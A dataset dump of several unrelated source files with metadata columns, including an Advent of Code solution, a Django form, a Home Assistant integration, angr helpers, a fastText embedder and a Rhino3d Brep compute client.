| 24.941176 | 46 | 0.570755 | 59 | 424 | 4.101695 | 0.525424 | 0.136364 | 0.132231 | 0.165289 | 0.157025 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031646 | 0.254717 | 424 | 16 | 47 | 26.5 | 0.734177 | 0 | 0 | 0 | 0 | 0 | 0.158019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.133333 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fceaf9fd2340a5d546f20a5d9c09da2d4e7e2c0c | 1,237 | py | Python | 2018/day4.py | dimkarakostas/advent-of-code | fb9c12eabc3342c607e24da1edeb7e5643400263 | [
"MIT"
] | 2 | 2018-12-06T09:39:35.000Z | 2020-12-18T19:38:40.000Z | 2018/day4.py | dimkarakostas/advent-of-code | fb9c12eabc3342c607e24da1edeb7e5643400263 | [
"MIT"
] | null | null | null | 2018/day4.py | dimkarakostas/advent-of-code | fb9c12eabc3342c607e24da1edeb7e5643400263 | [
"MIT"
] | null | null | null | import operator
from collections import defaultdict
with open('input4', 'r') as f:
events = sorted(f.readlines())
guard_shifts = defaultdict(list)
guard_totals = defaultdict(int)
guard_id = ''
for e in events:
e = e.split()
if e[-1] == 'shift':
guard_id = int(e[3][1:])
if e[-1] in ['asleep', 'up']:
guard_shifts[guard_id].append(int(e[1][3:5]))
if e[-1] == 'up':
guard_totals[guard_id] += guard_shifts[guard_id][-1] - guard_shifts[guard_id][-2]
max_guard = (0, 0, 0)
guard_mins = {}
for guard_id in guard_shifts:
guard_mins[guard_id] = [0 for _ in range(60)]
shifts = guard_shifts[guard_id]
for idx in range(0, len(shifts), 2):
start = shifts[idx]
stop = shifts[idx + 1]
for m in range(start, stop):
guard_mins[guard_id][m] += 1
max_idx = int(guard_mins[guard_id].index(max(guard_mins[guard_id])))
if guard_mins[guard_id][max_idx] > max_guard[2]:
max_guard = (guard_id, max_idx, guard_mins[guard_id][max_idx])
guard_id = max(guard_totals.iteritems(), key=operator.itemgetter(1))[0]
print 'Part 1:', guard_id * int(guard_mins[guard_id].index(max(guard_mins[guard_id])))
print 'Part 2:', max_guard[0] * max_guard[1]
| 32.552632 | 93 | 0.63945 | 202 | 1,237 | 3.683168 | 0.242574 | 0.178763 | 0.150538 | 0.172043 | 0.198925 | 0.174731 | 0.115591 | 0.115591 | 0.115591 | 0.115591 | 0 | 0.028254 | 0.198868 | 1,237 | 37 | 94 | 33.432432 | 0.722503 | 0 | 0 | 0 | 0 | 0 | 0.029103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.064516 | null | null | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcf38cb8f2a74c4130c1e494bd0e1b74f74a0df4 | 187 | py | Python | writeData.py | Aksonik/quickPyPlot | c5b202e954f86f664dd9ced98e9860c2ac1be06a | [
"MIT"
] | null | null | null | writeData.py | Aksonik/quickPyPlot | c5b202e954f86f664dd9ced98e9860c2ac1be06a | [
"MIT"
] | null | null | null | writeData.py | Aksonik/quickPyPlot | c5b202e954f86f664dd9ced98e9860c2ac1be06a | [
"MIT"
] | null | null | null | class writeDataClass():
def writeData(self,dataFiles):
fileData=open("plt.dat","w")
for f in range(0,len(dataFiles)):
fileData.write("%s\n" % dataFiles[f])
fileData.close()
| 17 | 40 | 0.668449 | 26 | 187 | 4.807692 | 0.807692 | 0.272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.144385 | 187 | 10 | 41 | 18.7 | 0.775 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcf39bf7ff16b2c3cf73f563a23b1166cb813450 | 474 | py | Python | people/forms.py | JimInCO/bishopric_tools | 6d7ddee52eb1f5884b051d9cb2eab9c241663423 | [
"MIT"
] | null | null | null | people/forms.py | JimInCO/bishopric_tools | 6d7ddee52eb1f5884b051d9cb2eab9c241663423 | [
"MIT"
] | 2 | 2020-03-09T04:49:55.000Z | 2020-03-10T04:08:16.000Z | people/forms.py | JimInCO/bishopric_tools | 6d7ddee52eb1f5884b051d9cb2eab9c241663423 | [
"MIT"
] | null | null | null | from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django import forms
from people.models import Member
class MemberAddForm(forms.ModelForm):
class Meta:
model = Member
exclude = ["active"]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.add_input(Submit("submit", "Create Member"))
self.helper.form_id = "add-form"
| 26.333333 | 64 | 0.677215 | 57 | 474 | 5.421053 | 0.526316 | 0.097087 | 0.097087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21308 | 474 | 17 | 65 | 27.882353 | 0.828418 | 0 | 0 | 0 | 0 | 0 | 0.06962 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1e060c1f35b19e4fa9cc45cd4bbf4d474fcfe0a9 | 716 | py | Python | homeassistant/components/energy/__init__.py | Andrew55529/core | c440a30aff0d8f573d8aa0d949068702dd36c386 | [
"Apache-2.0"
] | 1 | 2021-07-31T21:08:49.000Z | 2021-07-31T21:08:49.000Z | homeassistant/components/energy/__init__.py | flexy2dd/core | 1019ee22ff13e5f542e868179d791e6a0d87369a | [
"Apache-2.0"
] | 70 | 2020-07-16T02:07:46.000Z | 2022-03-31T06:01:48.000Z | homeassistant/components/energy/__init__.py | flexy2dd/core | 1019ee22ff13e5f542e868179d791e6a0d87369a | [
"Apache-2.0"
] | 1 | 2020-03-09T19:15:38.000Z | 2020-03-09T19:15:38.000Z | """The Energy integration."""
from __future__ import annotations
from homeassistant.components import frontend
from homeassistant.core import HomeAssistant
from homeassistant.helpers import discovery
from homeassistant.helpers.typing import ConfigType
from . import websocket_api
from .const import DOMAIN
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up Energy."""
websocket_api.async_setup(hass)
frontend.async_register_built_in_panel(hass, DOMAIN, DOMAIN, "mdi:lightning-bolt")
hass.async_create_task(
discovery.async_load_platform(hass, "sensor", DOMAIN, {}, config)
)
hass.data[DOMAIN] = {
"cost_sensors": {},
}
return True
| 27.538462 | 86 | 0.743017 | 84 | 716 | 6.130952 | 0.52381 | 0.132039 | 0.093204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162011 | 716 | 25 | 87 | 28.64 | 0.858333 | 0.032123 | 0 | 0 | 0 | 0 | 0.053973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.411765 | 0 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
1e085582e8db64dd99eb9d89c66830c3c453bdd6 | 342 | py | Python | lesson 1/p8-highest.py | hamburgcodingschool/L2C-1903 | 759c273edb4b2e1685c28f932694f7a5a1e2b0a1 | [
"MIT"
] | null | null | null | lesson 1/p8-highest.py | hamburgcodingschool/L2C-1903 | 759c273edb4b2e1685c28f932694f7a5a1e2b0a1 | [
"MIT"
] | null | null | null | lesson 1/p8-highest.py | hamburgcodingschool/L2C-1903 | 759c273edb4b2e1685c28f932694f7a5a1e2b0a1 | [
"MIT"
] | null | null | null |
# print("Please insert a number")
# a = int(input("> "))
# print("Please insert another number")
# b = int(input("> "))
# print("Please insert yet another number")
# c = int(input("> "))
a = 4
b = 5
c = 10
if a > b:
if a > c:
print(a)
else:
print(c)
else:
if b > c:
print(b)
else:
print(c) | 14.25 | 43 | 0.494152 | 51 | 342 | 3.313725 | 0.313725 | 0.195266 | 0.301775 | 0.224852 | 0.295858 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017316 | 0.324561 | 342 | 24 | 44 | 14.25 | 0.714286 | 0.508772 | 0 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e1f0a6daa16d5e3e8cb26636dfce0d7bc6d2104 | 1,010 | py | Python | hase/symbex/procedures/helper.py | bet4it/hase | 35022b6142ae43e48b6cf3b0d719a2743e37660e | [
"BSD-2-Clause"
] | 69 | 2018-04-05T15:16:13.000Z | 2022-01-09T21:23:09.000Z | hase/symbex/procedures/helper.py | bet4it/hase | 35022b6142ae43e48b6cf3b0d719a2743e37660e | [
"BSD-2-Clause"
] | 28 | 2018-05-09T04:08:39.000Z | 2019-03-12T11:41:47.000Z | hase/symbex/procedures/helper.py | bet4it/hase | 35022b6142ae43e48b6cf3b0d719a2743e37660e | [
"BSD-2-Clause"
] | 6 | 2018-04-19T20:47:43.000Z | 2020-09-03T17:04:44.000Z | import angr
from ... import errors
# Need to resymbolize hooks
def test_concrete_value(proc, sym, value):
if not proc.state.solver.symbolic(sym):
if proc.state.solver.eval(sym) == value:
return True
return False
def errno_success(proc):
return proc.state.solver.If(
proc.state.solver.BoolS("errno"),
proc.state.solver.BVV(0, proc.state.arch.bits),
proc.state.solver.BVV(-1, proc.state.arch.bits),
)
def null_success(proc, sym):
return proc.state.solver.If(
proc.state.solver.BoolS("errno"),
sym,
proc.state.solver.BVV(0, proc.state.arch.bits),
)
def minmax(proc, sym, upper=None):
try:
min_v = proc.state.solver.min(sym)
max_v = proc.state.solver.max(sym)
if upper:
return max(min_v, min(max_v, upper))
return max_v
except angr.SimUnsatError:
if upper:
return upper
else:
raise errors.HaseError("Cannot eval value")
| 23.488372 | 56 | 0.610891 | 139 | 1,010 | 4.374101 | 0.323741 | 0.207237 | 0.271382 | 0.083882 | 0.314145 | 0.276316 | 0.276316 | 0.276316 | 0.276316 | 0.157895 | 0 | 0.004054 | 0.267327 | 1,010 | 42 | 57 | 24.047619 | 0.817568 | 0.024752 | 0 | 0.258065 | 0 | 0 | 0.027467 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.064516 | 0.064516 | 0.419355 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e26d24bae72fb15208d8205bdc097db6b815769 | 435 | py | Python | src/training/listen/Listen.py | sbetageri/ralph | 7449c78342b49ea79a26189fc749eecd64e775c8 | [
"MIT"
] | null | null | null | src/training/listen/Listen.py | sbetageri/ralph | 7449c78342b49ea79a26189fc749eecd64e775c8 | [
"MIT"
] | null | null | null | src/training/listen/Listen.py | sbetageri/ralph | 7449c78342b49ea79a26189fc749eecd64e775c8 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
class ListenNet(nn.Module):
def __init__(self, device):
super(ListenNet, self).__init__()
self.lstm = nn.LSTM(input_size=13, hidden_size=256, num_layers=3)
self.lstm = self.lstm.to(device)
def forward(self, x):
lstm_out, (hidden, carry)= self.lstm(x)
return lstm_out, hidden[:, -1]
def get_parameters(self):
return self.lstm.parameters() | 29 | 73 | 0.645977 | 62 | 435 | 4.306452 | 0.483871 | 0.149813 | 0.097378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020772 | 0.225287 | 435 | 15 | 74 | 29 | 0.771513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.166667 | 0.083333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1e407cc6c79f1ba3f1ed19e45d791c550ce33056 | 849 | py | Python | woffle/embed/numeric/fasttext/embed.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 5 | 2019-03-06T14:35:46.000Z | 2022-01-15T22:33:59.000Z | woffle/embed/numeric/fasttext/embed.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 29 | 2018-12-03T12:47:19.000Z | 2019-01-21T14:58:46.000Z | woffle/embed/numeric/fasttext/embed.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 2 | 2018-12-12T14:41:14.000Z | 2018-12-14T20:53:01.000Z | """
fasttext embedding functionality
The important function here is 'embed' which has signature
embed :: String -> [Float], everything else should just be part of it
"""
#-- Imports ---------------------------------------------------------------------
# base
import functools
from typing import List, NewType
# third party
import fastText
import toml
#-- Type synonyms ---------------------------------------------------------------
Model = NewType('Model', fastText.FastText._FastText)
#-- Definitions -----------------------------------------------------------------
# variables
config = toml.load('config.ini')
model = fastText.load_model(config['fasttext']['model'])
def embedding(m: Model, x : str) -> List[float]:
return m.get_word_vector(x)
embed_ = functools.partial(embedding, model)
embed = functools.partial(map, embed_)
| 24.257143 | 81 | 0.558304 | 84 | 849 | 5.571429 | 0.607143 | 0.055556 | 0.089744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117786 | 849 | 34 | 82 | 24.970588 | 0.624833 | 0.506478 | 0 | 0 | 0 | 0 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0.090909 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1e421cde1fb53f5b4e2b4043c5d9512adee1d626 | 401 | py | Python | db.py | maxriposati/grupo43 | e22ca0a183bfe891f9ba0a46354c9390b739fe46 | [
"MIT"
] | null | null | null | db.py | maxriposati/grupo43 | e22ca0a183bfe891f9ba0a46354c9390b739fe46 | [
"MIT"
] | null | null | null | db.py | maxriposati/grupo43 | e22ca0a183bfe891f9ba0a46354c9390b739fe46 | [
"MIT"
] | null | null | null | import sqlite3
from sqlite3 import Error
from flask import g
def get_db():
try:
if 'db' not in g:
g.db=sqlite3.connect('db/database.db')
return g.db
except Error:
print(Error)
def close_db():
db = g.pop('db',None)
if db is not None:
db.close()
import sqlite3
from sqlite3 import Error
from flask import current_app, g
| 19.095238 | 51 | 0.591022 | 60 | 401 | 3.9 | 0.4 | 0.111111 | 0.145299 | 0.205128 | 0.42735 | 0.42735 | 0.42735 | 0.42735 | 0.42735 | 0 | 0 | 0.018382 | 0.321696 | 401 | 20 | 52 | 20.05 | 0.841912 | 0 | 0 | 0.235294 | 0 | 0 | 0.047244 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.352941 | 0 | 0.529412 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
1e43a2fc2bcfec9b5d86445633aabea08a83f0a3 | 20,363 | py | Python | src/compute.client/python_client/compute_rhino3d/Brep.py | EmilPoulsen/compute.rhino3d | 05a1bd43e5f319eb313032f99bdd2624c4ea9e42 | [
"MIT"
] | 1 | 2022-02-20T19:01:48.000Z | 2022-02-20T19:01:48.000Z | src/compute.client/python_client/compute_rhino3d/Brep.py | interopxyz/compute.rhino3d | 05a1bd43e5f319eb313032f99bdd2624c4ea9e42 | [
"MIT"
] | null | null | null | src/compute.client/python_client/compute_rhino3d/Brep.py | interopxyz/compute.rhino3d | 05a1bd43e5f319eb313032f99bdd2624c4ea9e42 | [
"MIT"
] | 5 | 2018-10-27T17:06:15.000Z | 2019-04-07T10:31:08.000Z | from . import Util
def ChangeSeam(face, direction, parameter, tolerance):
args = [face, direction, parameter, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/changeseam-brepface_int_double_double", args)
return response
def CopyTrimCurves(trimSource, surfaceSource, tolerance):
args = [trimSource, surfaceSource, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/copytrimcurves-brepface_surface_double", args)
return response
def CreateBaseballSphere(center, radius, tolerance):
args = [center, radius, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbaseballsphere-point3d_double_double", args)
return response
def CreateDevelopableLoft(crv0, crv1, reverse0, reverse1, density):
args = [crv0, crv1, reverse0, reverse1, density]
response = Util.ComputeFetch("rhino/geometry/brep/createdevelopableloft-curve_curve_bool_bool_int", args)
return response
def CreateDevelopableLoft1(rail0, rail1, fixedRulings):
args = [rail0, rail1, fixedRulings]
response = Util.ComputeFetch("rhino/geometry/brep/createdevelopableloft-nurbscurve_nurbscurve_point2darray", args)
return response
def CreatePlanarBreps(inputLoops):
args = [inputLoops]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curvearray", args)
return response
def CreatePlanarBreps1(inputLoops, tolerance):
args = [inputLoops, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curvearray_double", args)
return response
def CreatePlanarBreps2(inputLoop):
args = [inputLoop]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curve", args)
return response
def CreatePlanarBreps3(inputLoop, tolerance):
args = [inputLoop, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-curve_double", args)
return response
def CreateTrimmedSurface(trimSource, surfaceSource):
args = [trimSource, surfaceSource]
response = Util.ComputeFetch("rhino/geometry/brep/createtrimmedsurface-brepface_surface", args)
return response
def CreateTrimmedSurface1(trimSource, surfaceSource, tolerance):
args = [trimSource, surfaceSource, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createtrimmedsurface-brepface_surface_double", args)
return response
def CreateFromCornerPoints(corner1, corner2, corner3, tolerance):
args = [corner1, corner2, corner3, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromcornerpoints-point3d_point3d_point3d_double", args)
return response
def CreateFromCornerPoints1(corner1, corner2, corner3, corner4, tolerance):
args = [corner1, corner2, corner3, corner4, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromcornerpoints-point3d_point3d_point3d_point3d_double", args)
return response
def CreateEdgeSurface(curves):
args = [curves]
response = Util.ComputeFetch("rhino/geometry/brep/createedgesurface-curvearray", args)
return response
def CreatePlanarBreps(inputLoops):
args = [inputLoops]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-rhino.collections.curvelist", args)
return response
def CreatePlanarBreps1(inputLoops, tolerance):
args = [inputLoops, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createplanarbreps-rhino.collections.curvelist_double", args)
return response
def CreateFromOffsetFace(face, offsetDistance, offsetTolerance, bothSides, createSolid):
args = [face, offsetDistance, offsetTolerance, bothSides, createSolid]
response = Util.ComputeFetch("rhino/geometry/brep/createfromoffsetface-brepface_double_double_bool_bool", args)
return response
def CreateSolid(breps, tolerance):
args = [breps, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createsolid-breparray_double", args)
return response
def MergeSurfaces(surface0, surface1, tolerance, angleToleranceRadians):
args = [surface0, surface1, tolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/mergesurfaces-surface_surface_double_double", args)
return response
def MergeSurfaces1(brep0, brep1, tolerance, angleToleranceRadians):
args = [brep0, brep1, tolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/mergesurfaces-brep_brep_double_double", args)
return response
def MergeSurfaces2(brep0, brep1, tolerance, angleToleranceRadians, point0, point1, roundness, smooth):
args = [brep0, brep1, tolerance, angleToleranceRadians, point0, point1, roundness, smooth]
response = Util.ComputeFetch("rhino/geometry/brep/mergesurfaces-brep_brep_double_double_point2d_point2d_double_bool", args)
return response
def CreatePatch(geometry, startingSurface, tolerance):
args = [geometry, startingSurface, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createpatch-geometrybasearray_surface_double", args)
return response
def CreatePatch1(geometry, uSpans, vSpans, tolerance):
args = [geometry, uSpans, vSpans, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createpatch-geometrybasearray_int_int_double", args)
return response
def CreatePatch2(geometry, startingSurface, uSpans, vSpans, trim, tangency, pointSpacing, flexibility, surfacePull, fixEdges, tolerance):
args = [geometry, startingSurface, uSpans, vSpans, trim, tangency, pointSpacing, flexibility, surfacePull, fixEdges, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createpatch-geometrybasearray_surface_int_int_bool_bool_double_double_double_boolarray_double", args)
return response
def CreatePipe(rail, radius, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians):
args = [rail, radius, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/createpipe-curve_double_bool_pipecapmode_bool_double_double", args)
return response
def CreatePipe1(rail, railRadiiParameters, radii, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians):
args = [rail, railRadiiParameters, radii, localBlending, cap, fitRail, absoluteTolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/createpipe-curve_doublearray_doublearray_bool_pipecapmode_bool_double_double", args)
return response
def CreateFromSweep(rail, shape, closed, tolerance):
args = [rail, shape, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curve_bool_double", args)
return response
def CreateFromSweep1(rail, shapes, closed, tolerance):
args = [rail, shapes, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curvearray_bool_double", args)
return response
def CreateFromSweep2(rail1, rail2, shape, closed, tolerance):
args = [rail1, rail2, shape, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curve_curve_bool_double", args)
return response
def CreateFromSweep3(rail1, rail2, shapes, closed, tolerance):
args = [rail1, rail2, shapes, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweep-curve_curve_curvearray_bool_double", args)
return response
def CreateFromSweepInParts(rail1, rail2, shapes, rail_params, closed, tolerance):
args = [rail1, rail2, shapes, rail_params, closed, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromsweepinparts-curve_curve_curvearray_point2darray_bool_double", args)
return response
def CreateFromTaperedExtrude(curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType, tolerance, angleToleranceRadians):
args = [curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType, tolerance, angleToleranceRadians]
response = Util.ComputeFetch("rhino/geometry/brep/createfromtaperedextrude-curve_double_vector3d_point3d_double_extrudecornertype_double_double", args)
return response
def CreateFromTaperedExtrude1(curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType):
args = [curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType]
response = Util.ComputeFetch("rhino/geometry/brep/createfromtaperedextrude-curve_double_vector3d_point3d_double_extrudecornertype", args)
return response
def CreateBlendSurface(face0, edge0, domain0, rev0, continuity0, face1, edge1, domain1, rev1, continuity1):
args = [face0, edge0, domain0, rev0, continuity0, face1, edge1, domain1, rev1, continuity1]
response = Util.ComputeFetch("rhino/geometry/brep/createblendsurface-brepface_brepedge_interval_bool_blendcontinuity_brepface_brepedge_interval_bool_blendcontinuity", args)
return response
def CreateBlendShape(face0, edge0, t0, rev0, continuity0, face1, edge1, t1, rev1, continuity1):
args = [face0, edge0, t0, rev0, continuity0, face1, edge1, t1, rev1, continuity1]
response = Util.ComputeFetch("rhino/geometry/brep/createblendshape-brepface_brepedge_double_bool_blendcontinuity_brepface_brepedge_double_bool_blendcontinuity", args)
return response
def CreateFilletSurface(face0, uv0, face1, uv1, radius, extend, tolerance):
args = [face0, uv0, face1, uv1, radius, extend, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfilletsurface-brepface_point2d_brepface_point2d_double_bool_double", args)
return response
def CreateChamferSurface(face0, uv0, radius0, face1, uv1, radius1, extend, tolerance):
args = [face0, uv0, radius0, face1, uv1, radius1, extend, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createchamfersurface-brepface_point2d_double_brepface_point2d_double_bool_double", args)
return response
def CreateFilletEdges(brep, edgeIndices, startRadii, endRadii, blendType, railType, tolerance):
args = [brep, edgeIndices, startRadii, endRadii, blendType, railType, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfilletedges-brep_intarray_doublearray_doublearray_blendtype_railtype_double", args)
return response
def CreateFromJoinedEdges(brep0, edgeIndex0, brep1, edgeIndex1, joinTolerance):
args = [brep0, edgeIndex0, brep1, edgeIndex1, joinTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromjoinededges-brep_int_brep_int_double", args)
return response
def CreateFromLoft(curves, start, end, loftType, closed):
args = [curves, start, end, loftType, closed]
response = Util.ComputeFetch("rhino/geometry/brep/createfromloft-curvearray_point3d_point3d_lofttype_bool", args)
return response
def CreateFromLoftRebuild(curves, start, end, loftType, closed, rebuildPointCount):
args = [curves, start, end, loftType, closed, rebuildPointCount]
response = Util.ComputeFetch("rhino/geometry/brep/createfromloftrebuild-curvearray_point3d_point3d_lofttype_bool_int", args)
return response
def CreateFromLoftRefit(curves, start, end, loftType, closed, refitTolerance):
args = [curves, start, end, loftType, closed, refitTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromloftrefit-curvearray_point3d_point3d_lofttype_bool_double", args)
return response
def CreateBooleanUnion(breps, tolerance):
args = [breps, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanunion-breparray_double", args)
return response
def CreateBooleanUnion1(breps, tolerance, manifoldOnly):
args = [breps, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanunion-breparray_double_bool", args)
return response
def CreateBooleanIntersection(firstSet, secondSet, tolerance):
args = [firstSet, secondSet, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-breparray_breparray_double", args)
return response
def CreateBooleanIntersection1(firstSet, secondSet, tolerance, manifoldOnly):
args = [firstSet, secondSet, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-breparray_breparray_double_bool", args)
return response
def CreateBooleanIntersection2(firstBrep, secondBrep, tolerance):
args = [firstBrep, secondBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-brep_brep_double", args)
return response
def CreateBooleanIntersection3(firstBrep, secondBrep, tolerance, manifoldOnly):
args = [firstBrep, secondBrep, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-brep_brep_double_bool", args)
return response
def CreateBooleanDifference(firstSet, secondSet, tolerance):
args = [firstSet, secondSet, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-breparray_breparray_double", args)
return response
def CreateBooleanDifference1(firstSet, secondSet, tolerance, manifoldOnly):
args = [firstSet, secondSet, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-breparray_breparray_double_bool", args)
return response
def CreateBooleanDifference2(firstBrep, secondBrep, tolerance):
args = [firstBrep, secondBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-brep_brep_double", args)
return response
def CreateBooleanDifference3(firstBrep, secondBrep, tolerance, manifoldOnly):
args = [firstBrep, secondBrep, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-brep_brep_double_bool", args)
return response
def CreateShell(brep, facesToRemove, distance, tolerance):
